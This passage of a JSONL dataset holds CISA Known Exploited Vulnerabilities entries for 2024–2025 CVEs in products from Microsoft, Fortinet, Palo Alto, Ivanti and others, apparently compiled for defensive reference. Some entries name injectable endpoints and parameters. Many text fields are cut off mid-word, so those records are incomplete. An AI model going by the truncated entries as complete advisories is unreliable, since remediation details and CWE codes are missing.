Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Storage contains a link following vulnerability that could allow for privilege escalation. This vulnerability could allow an attacker to delete data including data that results in the service being unavailable.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-59\n\n[Source: CISA Known Exploited Vulnerabiliti", "cve_id": "CVE-2025-21391", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-0994", "text": "Trimble Cityworks Deserialization Vulnerability\n\nAffected: Trimble Cityworks\n\nTrimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-0994", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21413", "text": "Microsoft Outlook Improper Input Validation Vulnerability\n\nAffected: Microsoft Office Outlook\n\nMicrosoft Outlook contains an improper input validation vulnerability that allows for remote code execution. Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CW", "cve_id": "CVE-2024-21413", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-0411", "text": "7-Zip Mark of the Web Bypass Vulnerability\n\nAffected: 7-Zip 7-Zip\n\n7-Zip contains a protection mechanism failure vulnerability that allows remote attackers to bypass the Mark-of-the-Web security feature to execute arbitrary code in the context of the current user.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-0411", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-53104", "text": "Linux Kernel Out-of-Bounds Write Vulnerability\n\nAffected: Linux Kernel\n\nLinux kernel contains an out-of-bounds write vulnerability in the uvc_parse_streaming component of the USB Video Class (UVC) driver that could allow for physical escalation of privilege.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-53104", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-29059", "text": "Microsoft .NET Framework Information Disclosure Vulnerability\n\nAffected: Microsoft .NET Framework\n\nMicrosoft .NET Framework contains an information disclosure vulnerability that exposes the ObjRef URI to an attacker, ultimately enabling remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-209\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-29059", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-45195", "text": "Apache OFBiz Forced Browsing Vulnerability\n\nAffected: Apache OFBiz\n\nApache OFBiz contains a forced browsing vulnerability that allows a remote attacker to obtain unauthorized access.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-425\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-45195", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24085", "text": "Apple Multiple Products Use-After-Free Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, macOS, and other Apple products contain a user-after-free vulnerability that could allow a malicious application to elevate privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-24085", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-23006", "text": "SonicWall SMA1000 Appliances Deserialization Vulnerability\n\nAffected: SonicWall SMA1000 Appliances\n\nSonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC) contain a deserialization of untrusted data vulnerability, which can enable a remote, unauthenticated attacker to execute arbitrary OS commands.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[S", "cve_id": "CVE-2025-23006", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-50603", "text": "Aviatrix Controllers OS Command Injection Vulnerability\n\nAffected: Aviatrix Controllers\n\nAviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavaila", "cve_id": "CVE-2024-50603", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21335", "text": "Microsoft Windows Hyper-V NT Kernel Integration VSP Use-After-Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Hyper-V NT Kernel Integration VSP contains a use-after-free vulnerability that allows a local attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-21335", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21333", "text": "Microsoft Windows Hyper-V NT Kernel Integration VSP Heap-based Buffer Overflow Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Hyper-V NT Kernel Integration VSP contains a heap-based buffer overflow vulnerability that allows a local attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-21333", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-55591", "text": "Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability\n\nAffected: Fortinet FortiOS and FortiProxy\n\nFortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that may allow an unauthenticated, remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA ", "cve_id": "CVE-2024-55591", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-12686", "text": "BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) OS Command Injection Vulnerability\n\nAffected: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)\n\nBeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) contain an OS command injection vulnerability that can be exploited by an attacker with existing administrative privileges to upload a malicious file. Successful exploitation of this vulnerability can allow a remote attacker to execute underlying opera", "cve_id": "CVE-2024-12686", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-0282", "text": "Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability\n\nAffected: Ivanti Connect Secure, Policy Secure, and ZTA Gateways\n\nIvanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.\n\nRequired Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updat", "cve_id": "CVE-2025-0282", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-55550", "text": "Mitel MiCollab Path Traversal Vulnerability\n\nAffected: Mitel MiCollab\n\nMitel MiCollab contains a path traversal vulnerability that could allow an authenticated attacker with administrative privileges to read local files within the system due to insufficient input sanitization. This vulnerability can be chained with CVE-2024-41713, which allows an unauthenticated, remote attacker to read arbitrary files on the server.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use ", "cve_id": "CVE-2024-55550", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-41713", "text": "Mitel MiCollab Path Traversal Vulnerability\n\nAffected: Mitel MiCollab\n\nMitel MiCollab contains a path traversal vulnerability that could allow an attacker to gain unauthorized and unauthenticated access. This vulnerability can be chained with CVE-2024-55550, which allows an unauthenticated, remote attacker to read arbitrary files on the server.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s):", "cve_id": "CVE-2024-41713", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-3393", "text": "Palo Alto Networks PAN-OS Malicious DNS Packet Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nPalo Alto Networks PAN-OS contains a vulnerability in parsing and logging malicious DNS packets in the DNS Security feature that, when exploited, allows an unauthenticated attacker to remotely reboot the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the produc", "cve_id": "CVE-2024-3393", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-12356", "text": "BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection Vulnerability \n\nAffected: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)\n\nBeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) contain a command injection vulnerability, which can allow an unauthenticated attacker to inject commands that are run as a site user. \n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unava", "cve_id": "CVE-2024-12356", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-55956", "text": "Cleo Multiple Products Unauthenticated File Upload Vulnerability\n\nAffected: Cleo Multiple Products\n\nCleo Harmony, VLTrader, and LexiCom, which are managed file transfer products, contain an unrestricted file upload vulnerability that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the prod", "cve_id": "CVE-2024-55956", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-35250", "text": "Microsoft Windows Kernel-Mode Driver Untrusted Pointer Dereference Vulnerability \n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel-Mode Driver contains an untrusted pointer dereference vulnerability that allows a local attacker to escalate privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-822\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-35250", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20767", "text": "Adobe ColdFusion Improper Access Control Vulnerability\n\nAffected: Adobe ColdFusion\n\nAdobe ColdFusion contains an improper access control vulnerability that could allow an attacker to access or modify restricted files via an internet-exposed admin panel.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-20767", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-50623", "text": "Cleo Multiple Products Unrestricted File Upload Vulnerability\n\nAffected: Cleo Multiple Products\n\nCleo Harmony, VLTrader, and LexiCom, which are managed file transfer products, contain an unrestricted file upload and download vulnerability that can lead to remote code execution with elevated privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-434\n\n[Source: CISA Known Exploited Vul", "cve_id": "CVE-2024-50623", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-49138", "text": "Microsoft Windows Common Log File System (CLFS) Driver Heap-Based Buffer Overflow Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) driver contains a heap-based buffer overflow vulnerability that allows a local attacker to escalate privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-49138", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-51378", "text": "CyberPanel Incorrect Default Permissions Vulnerability\n\nAffected: CyberPersons CyberPanel\n\nCyberPanel contains an incorrect default permissions vulnerability that allows for authentication bypass and the execution of arbitrary commands using shell metacharacters in the statusfile property.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-276\n\n[Source: CISA Known Exploited Vulnerabilities ", "cve_id": "CVE-2024-51378", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-11667", "text": "Zyxel Multiple Firewalls Path Traversal Vulnerability\n\nAffected: Zyxel Multiple Firewalls\n\nMultiple Zyxel firewalls contain a path traversal vulnerability in the web management interface that could allow an attacker to download or upload files via a crafted URL.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-11667", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-11680", "text": "ProjectSend Improper Authentication Vulnerability\n\nAffected: ProjectSend ProjectSend\n\nProjectSend contains an improper authentication vulnerability that allows a remote, unauthenticated attacker to enable unauthorized modification of the application's configuration via crafted HTTP requests to options.php. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of", "cve_id": "CVE-2024-11680", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21287", "text": "Oracle Agile Product Lifecycle Management (PLM) Incorrect Authorization Vulnerability\n\nAffected: Oracle Agile Product Lifecycle Management (PLM)\n\nOracle Agile Product Lifecycle Management (PLM) contains an incorrect authorization vulnerability in the Process Extension component of the Software Development Kit. Successful exploitation of this vulnerability may result in unauthenticated file disclosure.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product i", "cve_id": "CVE-2024-21287", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-44309", "text": "Apple Multiple Products Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, macOS, and other Apple products contain an unspecified vulnerability when processing maliciously crafted web content that may lead to a cross-site scripting (XSS) attack.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-44309", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-44308", "text": "Apple Multiple Products Code Execution Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, macOS, and other Apple products contain an unspecified vulnerability when processing maliciously crafted web content that may lead to arbitrary code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-44308", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38813", "text": "VMware vCenter Server Privilege Escalation Vulnerability\n\nAffected: VMware vCenter Server\n\nVMware vCenter contains an improper check for dropped privileges vulnerability. This vulnerability could allow an attacker with network access to the vCenter Server to escalate privileges to root by sending a specially crafted packet.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-250, CWE-273\n\n[Source: CISA Known E", "cve_id": "CVE-2024-38813", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38812", "text": "VMware vCenter Server Heap-Based Buffer Overflow Vulnerability\n\nAffected: VMware vCenter Server\n\nVMware vCenter Server contains a heap-based buffer overflow vulnerability in the implementation of the DCERPC protocol. This vulnerability could allow an attacker with network access to the vCenter Server to execute remote code by sending a specially crafted packet.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): C", "cve_id": "CVE-2024-38812", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9474", "text": "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nPalo Alto Networks PAN-OS contains an OS command injection vulnerability that allows for privilege escalation through the web-based management interface for several PAN products, including firewalls and VPN concentrators.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, the management int", "cve_id": "CVE-2024-9474", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-0012", "text": "Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nPalo Alto Networks PAN-OS contains an authentication bypass vulnerability in the web-based management interface for several PAN-OS products, including firewalls and VPN concentrators.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, management interface for affected devices should not be", "cve_id": "CVE-2024-0012", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-1212", "text": "Progress Kemp LoadMaster OS Command Injection Vulnerability\n\nAffected: Progress Kemp LoadMaster\n\nProgress Kemp LoadMaster contains an OS command injection vulnerability that allows an unauthenticated, remote attacker to access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited", "cve_id": "CVE-2024-1212", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9465", "text": "Palo Alto Networks Expedition SQL Injection Vulnerability\n\nAffected: Palo Alto Networks Expedition\n\nPalo Alto Networks Expedition contains a SQL injection vulnerability that allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of t", "cve_id": "CVE-2024-9465", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9463", "text": "Palo Alto Networks Expedition OS Command Injection Vulnerability\n\nAffected: Palo Alto Networks Expedition\n\nPalo Alto Networks Expedition contains an OS command injection vulnerability that allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if miti", "cve_id": "CVE-2024-9463", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43451", "text": "Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows contains an NTLMv2 hash spoofing vulnerability that could result in disclosing a user's NTLMv2 hash to an attacker via a file open operation. The attacker could then leverage this hash to impersonate that user.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-73\n\n[Source: CISA Known Exploited Vuln", "cve_id": "CVE-2024-43451", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-49039", "text": "Microsoft Windows Task Scheduler Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Task Scheduler contains a privilege escalation vulnerability that can allow an attacker-provided, local application to escalate privileges outside of its AppContainer, and access privileged RPC functions.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-287\n\n[Source: CISA Kn", "cve_id": "CVE-2024-49039", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-51567", "text": "CyberPanel Incorrect Default Permissions Vulnerability\n\nAffected: CyberPersons CyberPanel\n\nCyberPanel contains an incorrect default permissions vulnerability that allows a remote, unauthenticated attacker to execute commands as root.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-276\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-51567", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43093", "text": "Android Framework Privilege Escalation Vulnerability\n\nAffected: Android Framework\n\nAndroid Framework contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-43093", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-5910", "text": "Palo Alto Networks Expedition Missing Authentication Vulnerability\n\nAffected: Palo Alto Networks Expedition\n\nPalo Alto Networks Expedition contains a missing authentication vulnerability that allows an attacker with network access to takeover an Expedition admin account and potentially access configuration secrets, credentials, and other data.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306\n\n[Source: C", "cve_id": "CVE-2024-5910", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-8956", "text": "PTZOptics PT30X-SDI/NDI Cameras Authentication Bypass Vulnerability\n\nAffected: PTZOptics PT30X-SDI/NDI Cameras\n\nPTZOptics PT30X-SDI/NDI cameras contain an insecure direct object reference (IDOR) vulnerability that allows a remote, attacker to bypass authentication for the /cgi-bin/param.cgi CGI script. If combined with CVE-2024-8957, this can lead to remote code execution as root.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are una", "cve_id": "CVE-2024-8956", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-8957", "text": "PTZOptics PT30X-SDI/NDI Cameras OS Command Injection Vulnerability\n\nAffected: PTZOptics PT30X-SDI/NDI Cameras\n\nPTZOptics PT30X-SDI/NDI cameras contain an OS command injection vulnerability that allows a remote, authenticated attacker to escalate privileges to root via a crafted payload with the ntp_addr parameter of the /cgi-bin/param.cgi CGI script. \n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[So", "cve_id": "CVE-2024-8957", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-37383", "text": "RoundCube Webmail Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Roundcube Webmail\n\nRoundCube Webmail contains a cross-site scripting (XSS) vulnerability in the handling of SVG animate attributes that allows a remote attacker to run malicious JavaScript code.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-37383", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20481", "text": "Cisco ASA and FTD Denial-of-Service Vulnerability\n\nAffected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\n\nCisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain a missing release of resource after effective lifetime vulnerability that could allow an unauthenticated, remote attacker to cause a denial-of-service (DoS) of the RAVPN service.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if miti", "cve_id": "CVE-2024-20481", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-47575", "text": "Fortinet FortiManager Missing Authentication Vulnerability\n\nAffected: Fortinet FortiManager\n\nFortinet FortiManager contains a missing authentication vulnerability in the fgfmd daemon that allows a remote, unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-47575", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38094", "text": "Microsoft SharePoint Deserialization Vulnerability\n\nAffected: Microsoft SharePoint\n\nMicrosoft SharePoint contains a deserialization vulnerability that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38094", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9537", "text": "ScienceLogic SL1 Unspecified Vulnerability\n\nAffected: ScienceLogic SL1\n\nScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-9537", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-40711", "text": "Veeam Backup and Replication Deserialization Vulnerability\n\nAffected: Veeam Backup & Replication\n\nVeeam Backup and Replication contains a deserialization vulnerability allowing an unauthenticated user to perform remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-40711", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-28987", "text": "SolarWinds Web Help Desk Hardcoded Credential Vulnerability\n\nAffected: SolarWinds Web Help Desk\n\nSolarWinds Web Help Desk contains a hardcoded credential vulnerability that could allow a remote, unauthenticated user to access internal functionality and modify data.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-798\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-28987", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9680", "text": "Mozilla Firefox Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox\n\nMozilla Firefox and Firefox ESR contain a use-after-free vulnerability in Animation timelines that allows for code execution in the content process.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-9680", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-30088", "text": "Microsoft Windows Kernel TOCTOU Race Condition Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel contains a time-of-check to time-of-use (TOCTOU) race condition vulnerability that could allow for privilege escalation. \n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-367\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-30088", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9380", "text": "Ivanti Cloud Services Appliance (CSA) OS Command Injection Vulnerability\n\nAffected: Ivanti Cloud Services Appliance (CSA)\n\nIvanti Cloud Services Appliance (CSA) contains an OS command injection vulnerability in the administrative console which can allow an authenticated attacker with application admin privileges to pass commands to the underlying OS.\n\nRequired Action: As Ivanti CSA 4.6.x has reached End-of-Life status, users are urged to remove CSA 4.6.x from service or upgrade to the 5.0.x line", "cve_id": "CVE-2024-9380", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-9379", "text": "Ivanti Cloud Services Appliance (CSA) SQL Injection Vulnerability\n\nAffected: Ivanti Cloud Services Appliance (CSA)\n\nIvanti Cloud Services Appliance (CSA) contains a SQL injection vulnerability in the admin web console in versions prior to 5.0.2, which can allow a remote attacker authenticated as administrator to run arbitrary SQL statements.\n\nRequired Action: As Ivanti CSA 4.6.x has reached End-of-Life status, users are urged to remove CSA 4.6.x from service or upgrade to the 5.0.x line, or late", "cve_id": "CVE-2024-9379", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23113", "text": "Fortinet Multiple Products Format String Vulnerability\n\nAffected: Fortinet Multiple Products\n\nFortinet FortiOS, FortiPAM, FortiProxy, and FortiWeb contain a format string vulnerability that allows a remote, unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-134\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-23113", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43573", "text": "Microsoft Windows MSHTML Platform Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows MSHTML Platform contains an unspecified spoofing vulnerability which can lead to a loss of confidentiality.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-43573", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43572", "text": "Microsoft Windows Management Console Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Management Console contains unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-707\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-43572", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43047", "text": "Qualcomm Multiple Chipsets Use-After-Free Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain a use-after-free vulnerability due to memory corruption in DSP Services while maintaining memory maps of HLOS memory. \n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-43047", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-45519", "text": "Synacor Zimbra Collaboration Suite (ZCS) Command Execution Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains an unspecified vulnerability in the postjournal service that may allow an unauthenticated user to execute commands.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are 